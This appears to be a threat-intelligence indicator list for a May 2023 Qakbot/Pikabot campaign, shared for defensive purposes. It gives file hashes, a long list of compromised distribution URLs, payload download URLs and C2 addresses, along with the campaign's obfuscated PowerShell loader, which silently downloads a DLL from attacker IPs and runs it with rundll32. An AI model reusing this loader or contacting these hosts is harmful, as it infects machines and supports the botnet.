Qakbot_BB28_Pikabot_18.05.2023.txt
18.05.2023 | Qakbot / Pikabot | BB28 | Campaign | Version
*************************************************
.url https://123mkv.dev/iia/?1
.js 1015b0f17a4a19921e44338e91f937def92b0f497a74e1de46654a0986fc7646
.dll 8ee9141074b48784c89aa5d3cd4010fcf4e6d467b618c8719970f78fcc24a365
*************************************************
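Exec > (process command lines as observed; in the PowerShell below only $celioncusSacrilegiousness is read by the download loop, and the other base64 string variables are assigned but never referenced in the script as shown)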
wscript.exe C:\Users\Admin\AppData\Local\Temp\Fgdi.js
wscript.exe C:\Users\Admin\AppData\Local\Temp\Fgdi.js ExtirpationistStronglike Theologizing deepmouthed Micropegmatite
powershell.exe - WindowStyle Hidden - ExecutionPolicy Bypass - NoLogo - NoProfile - encodedcommand $Preexchanged = "aAB0AHQAcABzADoALwAvAFQAbwBrAGUAbgBzAC4AZgB5AGkAroaAB0AHQAcABzADoALwAvAFAAbABvAHcAbQBlAG4AQQBsAGwAbwB5AGEAZwBlAC4AYwByAHUAaQBzAGUAcwA=roaAB0AHQAcAA6AC8ALwAxADYAMAAuADQANQAuADUANQAuADEAOQAyAA==";
$Xenopeltid = "aAB0AHQAcABzADoALwAvADIANAAwAC4ANgA5AC4AMQAwADUALgAyADIANQA=kyaAB0AHQAcAA6AC8ALwAxADgANwAuADEAOAAxAC4ANQAzAC4AMQAyADAAkyaAB0AHQAcABzADoALwAvADQAMwAuADIAMgA1AC4AMQAzADcALgA4ADIAkyaAB0AHQAcABzADoALwAvAEIAeQBwAGEAcwBzAGUAZAAuAGMAbwBtAA==";
Start - Sleep - Seconds 9;
$ceratophrysCriocephalus = "aAB0AHQAcABzADoALwAvAEkAbgB0AGUAcgBtAGUAbgBzAHQAcgB1AHUAbQBVAG4AcABhAG4AbgBpAGUAcgBlAGQALgB0AG8AawB5AG8AfRxaAB0AHQAcABzADoALwAvAGEAYwBpAGQAbwBsAG8AZwB5AC4AcQB1AGUAYgBlAGMA";
$Vacationers = "aAB0AHQAcAA6AC8ALwBVAG4AdwBpAG4AdAByAHkALgBnAHMAaUOaAB0AHQAcAA6AC8ALwByAGUAcAByAGUAcwBlAG4AdABhAG0AZQBuAC4AcwBvAGwAYQByAA==aUOaAB0AHQAcABzADoALwAvADIAMwAzAC4AOQA3AC4AMgA1ADEALgAxADcANAA=aUOaAB0AHQAcAA6AC8ALwBEAG8AbABsAGEAcgBiAGkAcgBkAEcAZQBvAGMAaABlAG0AaQBzAHQAcgB5AC4AaQBuAHMAdABpAHQAdQB0AGUA";
$celioncusSacrilegiousness = "http://77.91.85.124/pNXY/wUA7n http://176.124.198.214/rAAOuv6/DBJLR http://77.91.87.226/2kUY1F/yEZhqwIFC8R0";
foreach($qantar in $celioncusSacrilegiousness - split "yF") {
$defeatsPreassumption = "aAB0AHQAcAA6AC8ALwBBAGIAagB1AGQAaQBjAGEAdABpAG8AbgBWAGkAbABsAGEAaQBuAGUAcwBzAC4AZwByAGkAcABlAA==";
try {
$Fricatrice = "aAB0AHQAcAA6AC8ALwAyADQANAAuADEAMwAxAC4AMQAyADQALgAyADIAMQA=aRwIaAB0AHQAcABzADoALwAvAE0AYQB1AHAAYQBzAHMAYQBuAHQALgBjAG8AZABlAHMA";
$raidingDefectlessness = "aAB0AHQAcAA6AC8ALwA3ADQALgAxADgAMgAuADEAOAA1AC4AMQAwADgA";
$Plebiscitarism = "aAB0AHQAcABzADoALwAvADEAOQA1AC4AMgA0ADEALgAyADAAMQAuADgANAA==oTaAB0AHQAcAA6AC8ALwBEAGUAdABpAG4AZQB0AFQAaAB5AHIAbwBpAGQAZQBhAGwALgBjAHIAaQBjAGsAZQB0AA===oTaAB0AHQAcAA6AC8ALwAxADQANgAuADEAOAA5AC4AMQA3ADMALgAxADQAMQA==oTaAB0AHQAcAA6AC8ALwBuAGUAcABoAHIAbwBwAHMALgBrAGkAdwBpAA==";
$unwrapperedProtoporphyrin = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($qantar));
iwr $unwrapperedProtoporphyrin - O $env: TEMP\ amphibolostylous.grommets;
$Extollation = "aAB0AHQAcABzADoALwAvAFYAYQBsAGsAeQByAGkAYQBPAHYAZQByAGMAaQByAGMAdQBsAGEAdABlAC4AbABlAGEAcwBlAA==xRaAB0AHQAcABzADoALwAvADEAMAA3AC4AMgAxADQALgAxADEAMgAuADEANgA3AA==xRaAB0AHQAcAA6AC8ALwA4ADkALgAxADMANQAuADEAMgA4AC4AMgA0ADUA";
if ((Get - Item - Path $env: TEMP\ amphibolostylous.grommets).Length - ge 250435) {
powershell - encodedcommand "start rundll32 $env:TEMP\amphibolostylous.grommets,Test;Expressjs";
$bridesmaidingPlaintiveness = "aAB0AHQAcABzADoALwAvAGIAbwBvAHQAZQBlAHMALgBxAHUAZQBiAGUAYwA=mKaAB0AHQAcAA6AC8ALwA5ADYALgAyADAANAAuADIAMQA0AC4AMQAzADUAmKaAB0AHQAcABzADoALwAvADEAMQA0AC4AMQAxADcALgAyADAAOAAuADEAMgAxAA==mKaAB0AHQAcAA6AC8ALwA1ADYALgAyADEANAAuADEANQAwAC4ANwAxAA==";
$PoultrydomLipide = "aAB0AHQAcABzADoALwAvAHQAYQBpAGwAbwByAGwAeQBTAGUAbQBpAGQAZQB0AGUAcgBtAGkAbgBpAHMAdABpAGMALgBpAG0AbQBvAGIAaQBsAGkAZQBuAA==OtlaAB0AHQAcABzADoALwAvADEANgAxAC4ANwA2AC4AOAAyAC4AMQAyADcAOtlaAB0AHQAcAA6AC8ALwA0ADAALgAxADMANAAuADEAMAA5AC4AMQA5ADUA";
$chokermanForfault = "aAB0AHQAcABzADoALwAvAEwAbwBvAGYAaQBlAC4AZwBvAGwAZgA=hFKaAB0AHQAcABzADoALwAvADEANgAzAC4AOAA2AC4AMgAyADEALgAyADMANgA=hFKaAB0AHQAcAA6AC8ALwAxADcAMwAuADIAMgA5AC4AMQA4ADEALgAxADAAMgA=";
break;
}
Expressjs;
} catch {
$placaeanObtected = "aAB0AHQAcAA6AC8ALwBlAG4AdABpAHIAZQB0AHkAQQBmAGYAZQBjAHQAZQBkAC4AcABhAHIAdABuAGUAcgBzAA==aaAB0AHQAcABzADoALwAvADEAOAAxAC4AMQAwADIALgA4ADQALgAxADcAOAA=";
$HlorrithiTurdetan = "aAB0AHQAcAA6AC8ALwBCAGEAcwBhAGwAdABpAGYAbwByAG0ARABlAHQAbwBuAGEAdABvAHIALgBjAHIAaQBjAGsAZQB0AA==";
$UnpuzzledSpeculate = "aAB0AHQAcAA6AC8ALwAxADUAOAAuADEANgA1AC4ANQAyAC4AMQA2ADcAbaAB0AHQAcABzADoALwAvAHMAcAByAHUAcwBoAC4AcwBpAA==baAB0AHQAcABzADoALwAvAG4AbwBuAGkAbgB0AHIAdQBzAGkAbwBuAGkAcwBtAC4AcwB0AHIAZQBhAG0A";
}
}
$lasarwortArborolatry = "aAB0AHQAcAA6AC8ALwBTAHkAbABsAGEAYgBpAGYAaQBlAGQALgBiAHUAcwBpAG4AZQBzAHMA";
$syngamicMetrocarcinoma = "aAB0AHQAcAA6AC8ALwAxADQAMwAuADEAMwAzAC4ANQA0AC4AMQA2ADQA";
*************************************************
.zip distro
https://123mkv.dev/mmi/?1
https://aamazehomes.com/cqsu/?1
https://abuylike.com/or/?1
https://acontecimientomundial.com/asuq/?1
https://adhyaystudio.com/as/?1
https://afreak.net/tor/?1
https://albarakatilaw.com/aaeu/?1
https://alberthvac1.com/mua/?1
https://allsimpackages.com/ae/?1
https://altaknyia.com/si/?1
https://amazonbirding.com/ial/?1
https://aprendainvestimentos.com/or/?1
https://ar-albania.com/nei/?1
https://asgharintl.net/uu/?1
https://audan.org/ssi/?1
https://autobom.org/eo/?1
https://awamia.com/cii/?1
https://ayyublabs.com/sduq/?1
https://batsamco.com/vulq/?1
https://bespokecj.com/mp/?1
https://besteducationlearn.com/teta/?1
https://bestosoftpro.com/muo/?1
https://bestvfxtraining.com/ti/?1
https://bgcityhotel.com/ilo/?1
https://bhbmaterials.com/cu/?1
https://biddyaniketonhighschool.com/isf/?1
https://bikinberkas.com/uv/?1
https://bimskol.org/ur/?1
https://biocoreopen.org/no/?1
https://biolablaboratorio.com/momi/?1
https://bmetal.co.uk/lno/?1
https://book-of-spells.com/euat/?1
https://book4noon.com/uiiu/?1
https://bookingdone.com/od/?1
https://bowwowavenue.com/enc/?1
https://bugscrum.com/dua/?1
https://cambodiandrivers.com/auso/?1
https://cbcmodesto.org/qma/?1
https://chiomastech.com/opn/?1
https://cloud47options.com/irdp/?1
https://cointrasur.com/siuc/?1
https://dankory.com/oemn/?1
https://darwinrhodes.com/lu/?1
https://datastatresearch.org/xpa/?1
https://delwanqatar.com/qaa/?1
https://dgisafe.com/aet/?1
https://dhfconstructionllc.com/ial/?1
https://dinaseithigal.com/umo/?1
https://divine-project.com/ne/?1
https://doidealbest.com/cie/?1
https://drive33.com/mo/?1
https://dwh-warenhandel.de/ta/?1
https://e-sophtgh.com/euc/?1
https://eagleuhd.com/ttae/?1
https://edusyms.org/tu/?1
https://ejbreneman.com/noo/?1
https://elibact.com/aeat/?1
https://elsassdestination.fr/tena/?1
https://esjpakistan.com/ndie/?1
https://etiskin.com/be/?1
https://examstospl.com/gnu/?1
https://fiestashawaianas.com/tar/?1
https://flixfallen.com/oi/?1
https://fondationmms.org/cb/?1
https://freebiezz.com/upet/?1
https://fsclbd.com/mtls/?1
https://futureadvisorconsultant.com/seia/?1
https://garagedoorrepairgrovelandma.com/eaqe/?1
https://garagedoorrepairhalifax.com/eera/?1
https://genesisoman.com/aluq/?1
https://golfviewhotelsuites.com/ituq/?1
https://govinacademy.com/nn/?1
https://gprproperty.com/uqaq/?1
https://growtharbor.com/mtl/?1
https://grupoexpoinout.com/eam/?1
https://gyanankurschool.com/tt/?1
https://haldoediames.com/cetn/?1
https://heissa-artie.com/ni/?1
https://helptimize.com/nl/?1
https://hirabsun.com/mie/?1
https://hypemediang.com/un/?1
https://ia-bc.com/adne/?1
https://ilcerchio-gruppoanalisi.it/omcs/?1
https://imagecolorist.com/tov/?1
https://imanagementpro.com/ipt/?1
https://imobiliariadigitalimoveis.com/aquu/?1
https://innoshopz.com/mis/?1
https://instantfunnellab.com/anis/?1
https://isac.net.in/ta/?1
https://itstoreindia.com/aqe/?1
https://jacksonkatz.com/dia/?1
https://jaridh.com/ma/?1
https://jobs-sa.net/ei/?1
https://jojoexports.com/rde/?1
https://joker123truewallet.net/tes/?1
https://jyothyvidyalaya.org/ansd/?1
https://kaleidoscoperocks.com/utes/?1
https://karwanfoodstuffs.com/tdse/?1
https://kingspalaceacademy.com/aeat/?1
https://lacasadespain.com/uii/?1
https://lambourndigital-webdev.com/ist/?1
https://lebapedia.com/ma/?1
https://lesbonscontacts.fr/ere/?1
https://lokhandwalaminerva.com/ttu/?1
https://lotusmont.com/etiq/?1
https://luicompressor.com/is/?1
https://lyhourgroup.com/imt/?1
https://maadalmill.com/dsml/?1
https://mambulaocabletv.com/mpae/?1
https://masr-alalmanya.com/au/?1
https://meetxgirls.com/dud/?1
https://mena-studies.org/ni/?1
https://minertecnologia.com/li/?1
https://missredwine.com/eu/?1
https://mnjgroup.net/mtu/?1
https://morningstarfoundation.org.ng/acvo/?1
https://mortalflix.com/rpe/?1
https://myiclicktv.com/pl/?1
https://neelikon.co.uk/sa/?1
https://noor786110.com/ess/?1
https://nutriapt.com/mnei/?1
https://om-services.co.uk/ou/?1
https://onlinequranforkids.com/ilh/?1
https://onlinetv23.com/fre/?1
https://opencarboncredits.com/cm/?1
https://opponepalcampaigns.com/aou/?1
https://optimalsolutionsonline.com/sb/?1
https://patmypets.com/sac/?1
https://pattersonoil.co.uk/ee/?1
https://pcssignal.com/se/?1
https://perchstoneandgraeys.com/eu/?1
https://perfectgadgetbd.com/su/?1
https://persiancarpetcompany.com/iasi/?1
https://pfixs.com/sr/?1
https://pipclass.com/atam/?1
https://plasticmetal.it/aeo/?1
https://poshcutz.com/idoo/?1
https://position1seo.co.uk/emeu/?1
https://pricelala.com/srs/?1
https://prixpharma.com/reib/?1
https://prosoftitservices.com/siu/?1
https://publiext.com/re/?1
https://questmedicalimaging.com/emmm/?1
https://rafaelamayaoficial.com/uam/?1
https://re-corre.com/qoxu/?1
https://redway4council.com/iqae/?1
https://reebootwellness.com/me/?1
https://reposebay.com/rii/?1
https://researchwritingexperts.com/tei/?1
https://rishtedar.com/deot/?1
https://rite-tags.com/ulr/?1
https://sahityaclasses.com/bst/?1
https://salesoxigen.com/utiq/?1
https://salmanpoultry.com/eqbu/?1
https://santiagotrader.com/tio/?1
https://scmsgroup.org/otag/?1
https://seedsindia.org/uae/?1
https://sercompublicidad.net/st/?1
https://shilhaandara.com/lru/?1
https://shotvet.com/iul/?1
https://simcomm.com/ota/?1
https://simracingpoint.com/eurr/?1
https://skillprism.org/tau/?1
https://skyparktravel.com/ca/?1
https://slglebanon.org/ped/?1
https://stacksmind.com/et/?1
https://standardlife.org.ng/oiel/?1
https://streamingbage.net.br/tor/?1
https://studemate.com/lm/?1
https://stylgasmic.com/bn/?1
https://suadienlanhthuduc.com/us/?1
https://sufirfan.org/lvu/?1
https://sugarnusantara.com/oot/?1
https://sumeetgroup.com/aa/?1
https://summapaincare.com/ou/?1
https://talentopportunities.net/nmnu/?1
https://tebiyu.com/mis/?1
https://techafresh.com/epia/?1
https://telecompunch.com/ql/?1
https://thebossstory.com/qise/?1
https://thedesignors.com/pu/?1
https://theheadsoccerunblocked.com/am/?1
https://thekingflix.com/umo/?1
https://theman-cave.com/oet/?1
https://thephoolmala.com/ties/?1
https://theuaemart.com/va/?1
https://tipsfreehealth.com/ovca/?1
https://tollywoodindustry.com/ti/?1
https://torunit.com/uud/?1
https://tovecpharma.com/iil/?1
https://treaty4news.com/sot/?1
https://trentosignal.com/ig/?1
https://trentosignal.com/qer/?1
https://trinifieds.com/tmlp/?1
https://tudien.org.vn/dif/?1
https://twoblokestrading.com/euu/?1
https://uaelistingsonline.com/rg/?1
https://ugssecurity.com/od/?1
https://valeinformado.com/alpt/?1
https://vedrishi.com/suui/?1
https://visaexpressbd.com/mmii/?1
https://voxforem.co.uk/qou/?1
https://web3solution.com/ists/?1
https://webcloner.net/soae/?1
https://wefoundworld.com/eeba/?1
https://wheretobuyelectronics.com/sali/?1
https://windowcollections.com/eoap/?1
https://winpeforum.com/ios/?1
https://wiseflys.com/pro/?1
https://wji.org.in/euvl/?1
https://worldjuniorshockey.com/deo/?1
https://worldsanalytics.com/solt/?1
https://worldtravel-trip.com/iit/?1
https://xpia-i.com/es/?1
https://yarrowenterprise.com/ut/?1
https://yayasanadeazhar.com/mucu/?1
https://yoursoutherngrill.com/sc/?1
https://zulfiyya.com/ut/?1
https://zulfiyya.com/ut/?1
.dll distro
http://77.91.87.226/2kUY1F/53UFrK
http://77.91.85.124/pNXY/s495BLC
http://176.124.198.214/rAAOuv6/IklFOWuh
*************************************************
c2's
192.9.135.73:1194
45.85.235.39:2078
129.80.164.200:32999
129.153.135.83:2078
129.213.54.49:2078
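192.213.54.49:2078 (differs from the previous entry only in the first octet, 192 vs 129; possible transcription error, verify before blocking)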
104.233.193.227:2078